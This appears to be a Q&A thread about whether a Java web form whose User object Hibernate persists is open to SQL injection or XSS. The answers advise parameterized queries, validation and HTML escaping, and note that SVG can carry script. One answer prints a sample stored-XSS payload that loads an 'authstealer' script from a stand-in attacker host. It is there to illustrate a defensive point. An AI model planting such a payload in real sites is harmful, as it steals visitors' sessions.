can attackers inject sql or javascripts into java POJOs?

Question

I have a form where users can register to my website The data is stored in a User POJO

class User{
private String userName;
private boolean enabled;
private Date registrationDate;
...
}

and then persisted to a database using

org.hibernate.Session.persist(User)

is there a way an attacker can do sql injection or XSS on the userName field ,contaminate the data or do any other type of attack and how do i protect against it?

Also can an attacker store sql statments or javascript code in a datatype other than String ?

Answer 1

https://www.owasp.org/index.php/Hibernate#A_note_about_SQL_injection

It is always better to validate form input. Since given object is relatively simple, it should not be a problem for you.

Also don't build your queries by string concatenation and use Query.setParameter() where needed. Those methods are dedicated for SQL-injection prevention and will eliminate this kind of risks.

Answer 2

From what you've posted so far this looks vulnerable to XSS. What if I provide the following string for my username:

Username<script src="http://myevilsite.com/authstealer.js">

Anyone who sees my username on the site will run some js.

Perhaps you should burp your site.

Answer 3

Clean usage of hibernate, say without doing ugly things, is safe. So no SQL injection .

However if the HTML form input is not guarded against JavaScript, you might get JS in a text in the database.

On outputing that text one must take care to do escapeHTML=true. Then no XSS .

In general not a big problem, but be aware for developers' laziness on admin pages with dumps and such; those pages might be created more simply.

On other formats: SVG (Scriptable Vector Format) is a beautiful scalable XML format for images, showable on HTML pages. They may however contain JavaScript for interaction.

The same holds for uploaded richt text and spreadsheet formats, sometimes saved in BLOB s in the database.